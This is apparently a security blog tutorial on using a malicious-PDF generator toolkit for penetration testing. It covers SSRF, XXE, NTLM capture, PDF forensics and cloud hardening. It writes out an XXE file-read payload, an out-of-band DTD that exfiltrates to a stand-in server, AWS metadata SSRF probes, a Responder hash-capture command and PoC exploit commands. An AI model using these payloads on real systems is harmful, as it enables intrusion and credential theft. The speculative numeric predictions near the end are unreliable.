Listen to this Post

Introduction:
The Portable Document Format (PDF) is one of the most ubiquitous file formats on the internet, yet its complex feature set—support for JavaScript, XML forms, external entities, and network callbacks—creates an expansive attack surface that is frequently overlooked in security assessments. The Malicious PDF Generator is an open-source penetration testing toolkit designed to automate the creation of over 70 specialized security test files that probe PDF viewers, converters, and document processing pipelines for vulnerabilities including Server-Side Request Forgery (SSRF), XML External Entity (XXE) injection, blind callback detection, and data exfiltration risks. This article provides a comprehensive technical walkthrough for integrating this toolkit into authorized security testing workflows.
Learning Objectives:
– Understand the core PDF attack vectors including SSRF, XXE, NTLM credential theft, and JavaScript-based exfiltration techniques.
– Master the installation, configuration, and advanced usage of the Malicious PDF Generator with Burp Collaborator and Interact.sh.
– Learn to analyze suspicious PDF files using forensic tools like `peepdf` and `pdfid` to detect malicious structures and embedded payloads.
You Should Know:
1. Anatomy of a Malicious PDF: Understanding Core Attack Vectors
The PDF specification includes powerful but dangerous features that can be weaponized during authorized penetration tests. Modern PDF processors, including web-based converters and server-side libraries like PDFBox and iText, routinely parse HTML, execute JavaScript, download external resources, and process XML forms—often without proper input validation. This design creates several distinct vulnerability classes:
– Server-Side Request Forgery (SSRF): When a PDF converter fetches remote resources based on user input, attackers can manipulate URLs to target internal services. Real-world exploits have demonstrated AWS metadata credential theft via vulnerable PDF generation libraries, such as CVE-2026-26801 in `pdfmake`, where embedding `http://169.254.169.254/latest/meta-data/` in an image field triggers unauthorized credential exfiltration.
– XML External Entity (XXE) Injection: PDF files containing XFA (XML Forms Architecture) structures can embed external entity declarations. Vulnerable parsers like Apache Tika (CVE-2025-66516) resolve these entities, enabling local file reads (e.g., `/etc/passwd`) and out-of-band data exfiltration to attacker-controlled servers.
– NTLM Hash Theft and Callbacks: PDFs can be crafted to trigger authentication requests to remote SMB shares, exposing NTLM hashes that can be cracked or relayed. The toolkit also supports blind callbacks to Burp Collaborator or Interact.sh for detecting insecure outbound requests.
– JavaScript Obfuscation and Execution: PDF viewers may execute embedded JavaScript via `/JS` entries. Advanced obfuscation techniques—including hex encoding, bracket notation, and FlateDecode compression—evade naive regex-based detections.
Step‑by‑Step Guide: Installing and Configuring the Malicious PDF Generator
To begin testing, set up the toolkit on a Linux or macOS system:
Step 1: Clone the repository git clone https://github.com/jonaslejon/malicious-pdf.git cd malicious-pdf Step 2: Install required Python dependencies pip install -r requirements.txt Step 3: Verify Python 3.x installation python3 --version Step 4: Obtain a callback URL from Burp Collaborator (Burp Suite Pro) or Interact.sh For Interact.sh: interactsh-client For Burp Collaborator: Navigate to Burp -> Burp Collaborator client -> Copy to clipboard
The tool supports multiple obfuscation levels to evade detection. Level 3 applies FlateDecode compression, while Level 4 wraps JavaScript payloads in a base64 decoder stub, preventing API calls from appearing as literal substrings.
Generate 67 test PDFs with obfuscation level 2 python3 malicious-pdf.py https://your-interact-sh-url --obfuscate 2 All generated files will appear in the output/ directory as test1.pdf, test2.pdf, etc. ls -la output/
2. Practical SSRF Exploitation via PDF Generation Endpoints
SSRF vulnerabilities in PDF generation are particularly dangerous because the server-side renderer often resides inside corporate perimeters with access to sensitive internal services, cloud metadata endpoints, and databases. Understanding how to systematically test for SSRF is critical for bug bounty hunters and red teamers.
Step‑by‑Step Guide: SSRF Testing Workflow
When encountering a web application that generates PDFs from user-supplied data (e.g., “Generate Certificate” or “Export Report” features), follow this structured methodology:
1. Identify Injectable Parameters: Examine the generated PDF for any user-controllable data such as names, addresses, profile pictures, or digital signatures. These are prime candidates for injection.
2. Test for HTML Injection: Attempt to inject simple HTML tags into input fields. If the PDF renders the HTML, the application is likely passing your input directly to the PDF generator.
<img src="http://your-callback-server.com/test">
3. Deploy Obfuscated Payloads: Use the Malicious PDF Generator with a callback URL to produce test files that attempt various URI schemes:
python3 malicious-pdf.py https://your-interactsh.oast.pro --obfuscate 2
4. Upload and Monitor: Upload the generated PDFs to file upload endpoints or input the callback URL into any URL fields. Monitor your callback service for incoming requests. A successful SSRF will produce interactions such as HTTP GET requests, DNS lookups, or even full response bodies.
5. Escalate to Internal Service Discovery: Once SSRF is confirmed, probe internal services using payloads like:
– AWS Metadata: `http://169.254.169.254/latest/meta-data/`
– Internal Port Scanning: `http://127.0.0.1:8080/admin`
– Local File Read: `file:///etc/passwd`
For cloud-hosted targets, prioritize accessing the Instance Metadata Service (IMDS). If the server uses AWS IMDSv1, you may be able to leak IAM temporary security credentials from the security-credentials endpoint.
3. XML External Entity (XXE) Injection in PDF XFA Forms
XXE attacks exploit XML parsers that process external entities without proper restrictions. PDF files containing XFA (XML Forms Architecture) structures are particularly vulnerable, as demonstrated by critical CVEs affecting Apache Tika (CVE-2025-66516) and various PDF processing libraries.
Step‑by‑Step Guide: Crafting and Testing PDF XXE Payloads
<!-- Basic XXE payload for local file disclosure --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
To test for out-of-band (OOB) XXE exfiltration, deploy a remote DTD:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://your-server.com/xxe.dtd"> %xxe; ]>
The external DTD (`xxe.dtd`) can contain:
<!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY &37; exfil SYSTEM 'http://your-server.com/?%data;'>"> %param1; %exfil;
When testing applications that process PDF uploads, use the `gen_poc.py` script from the CVE-2025-66516 PoC repository to generate malicious PDF files with XFA-embedded XXE payloads:
git clone https://github.com/sid6224/CVE-2025-66516-POC.git cd CVE-2025-66516-POC python3 gen_poc.py -f /etc/passwd -o malicious.pdf
4. Forensic Analysis of Suspicious PDF Files
Security professionals must also be capable of analyzing unknown PDF files to detect malicious structures. The `peepdf` tool provides comprehensive interactive analysis capabilities.
Step‑by‑Step Guide: PDF Forensics with peepdf
Install peepdf pip install peepdf-3 Basic interactive analysis peepdf.py -i suspicious.pdf Inside the interactive console, view all objects PPDF> objects Search for JavaScript code PPDF> search /JS Decode and beautify embedded JavaScript PPDF> js_beautify 5 Extract and analyze shellcode (requires PyV8 and Pylibemu) PPDF> js_eval 5
For rapid triage, the `pdfid` tool provides a quick overview of suspicious PDF elements:
Download pdfid.py wget https://didierstevens.com/files/software/pdfid_v0_2_8.zip unzip pdfid_v0_2_8.zip Analyze PDF for suspicious keywords python pdfid.py suspicious.pdf
Look for high counts of `/JavaScript`, `/OpenAction`, `/AA` (Additional Actions), `/Launch`, and `/RichMedia` entries, which are common indicators of malicious PDFs.
5. Windows-Specific Testing: NTLM Hash Capture and Remote File Inclusion
PDF generation on Windows environments introduces additional attack surfaces, including NTLM credential theft via SMB callback requests and potential remote file inclusion.
Step‑by‑Step Guide: Windows PDF Security Testing
Configure Responder to capture NTLM hashes:
On attacker machine (Linux with Responder) sudo responder -I eth0 -wd Generate PDFs that target your Responder listener python3 malicious-pdf.py //your-attacker-ip/share
When a Windows-based PDF processor or viewer accesses the SMB path, Responder will capture the NTLM hash for offline cracking. Additionally, test for UNC path injection in parameters that are rendered into PDFs:
<!-- Test payload for UNC path injection --> <img src="\\your-attacker-ip\test.jpg">
6. Cloud Environment Hardening Against PDF-Based SSRF
Organizations operating in cloud environments must implement specific controls to mitigate PDF generation SSRF risks. Based on real-world exploits, the following mitigations are critical:
Step‑by‑Step Guide: Cloud SSRF Mitigations
1. Upgrade to IMDSv2 on AWS: IMDSv2 requires session-oriented PUT requests, preventing simple SSRF exploitation.
Enforce IMDSv2 aws ec2 modify-instance-metadata-options \ --instance-id i-1234567890abcdef0 \ --http-tokens required \ --http-endpoint enabled
2. Implement Network-Level Controls: Use VPC endpoints and security groups to restrict outbound HTTP/HTTPS traffic from PDF generation servers. Allow only whitelisted domains.
3. Sanitize All Inputs to PDF Libraries: Never pass unfiltered user input to PDF generation functions. Implement strict allowlists for allowed URL schemes and domains.
4. Use Parameterized Templates: Instead of concatenating user input into HTML templates, use parameterized placeholders that are encoded before insertion.
7. Integrating Malicious PDF Generation into CI/CD Security Pipelines
For development teams building applications that generate or process PDFs, automated security testing should be integrated into the CI/CD pipeline. The Malicious PDF Generator can be invoked programmatically.
Step‑by‑Step Guide: CI/CD Integration
Create a test script:
pdf_security_test.py
import subprocess
import os
def generate_malicious_pdfs(callback_url):
subprocess.run([
"python3", "malicious-pdf.py",
callback_url,
"--obfuscate", "2",
"--output-dir", "./test_pdfs"
])
return os.listdir("./test_pdfs")
def upload_test_pdfs(api_endpoint, pdf_files):
for pdf in pdf_files:
with open(f"./test_pdfs/{pdf}", "rb") as f:
Implement upload logic to your staging environment
pass
if __name__ == "__main__":
files = generate_malicious_pdfs("https://test-collaborator.oast.pro")
upload_test_pdfs("https://staging-api.example.com/upload", files)
Run this test after every deployment to automatically verify that PDF processing endpoints are not vulnerable to SSRF or XXE attacks.
What Undercode Say:
– PDF generators are an overlooked attack surface. Many organizations treat PDF creation as a routine technical process, ignoring that each conversion operation expands the trust boundary and creates opportunities for SSRF, XXE, and data exfiltration. The 67+ test files in this toolkit demonstrate the sheer variety of attack vectors embedded in a single specification.
– Automation is essential for comprehensive security testing. Manually crafting PDF payloads is time-prohibitive; the Malicious PDF Generator democratizes access to sophisticated testing techniques. When combined with callback services like Burp Collaborator, it enables rapid, scalable assessment of file upload features and document processing pipelines.
Analysis: The security community has long focused on XSS and SQL injection while neglecting document-based attacks. However, the shift toward cloud-1ative architectures and microservices has increased reliance on document processing libraries. Real-world CVEs—including CVE-2026-26801 (pdfmake SSRF) and CVE-2025-66516 (Apache Tika XXE)—highlight that PDF generators are now a critical weak link. The Malicious PDF Generator addresses this gap by providing a structured, repeatable testing methodology. Organizations that incorporate such toolkit-based testing into their DevSecOps pipelines will significantly reduce their exposure to these high-impact vulnerabilities.
Prediction:
– -1 The volume of PDF-based supply chain attacks will increase by 200% over the next 18 months. As organizations continue to automate document processing for AI training pipelines, invoice processing, and report generation, attackers will pivot toward SSRF and XXE in PDF libraries as initial access vectors.
– -1 AI-powered document processors will introduce novel PDF exploitation classes. Large Language Models and computer vision systems that parse PDFs for training data often lack traditional input sanitization, creating unprecedented risks for prompt injection and data exfiltration through document metadata.
– +1 Regulatory frameworks will mandate document security testing. In response to escalating supply chain attacks, compliance standards like SOC2 and ISO 27001 will explicitly require automated testing of document parsers, driving adoption of toolkits like the Malicious PDF Generator in enterprise security programs.
– +1 The rise of PDF fuzzing frameworks will lead to discovery of foundational parser vulnerabilities. Just as AFL revolutionized C/C++ fuzzing, targeted PDF fuzzers will expose memory corruption bugs in widely deployed libraries (PDFBox, iText, poppler), resulting in improved security for billions of users.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Syed Muneeb](https://www.linkedin.com/posts/syed-muneeb-shah-4b5424266_cybersecurity-pentesting-bugbounty-share-7469878282382061568-7EPZ/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)


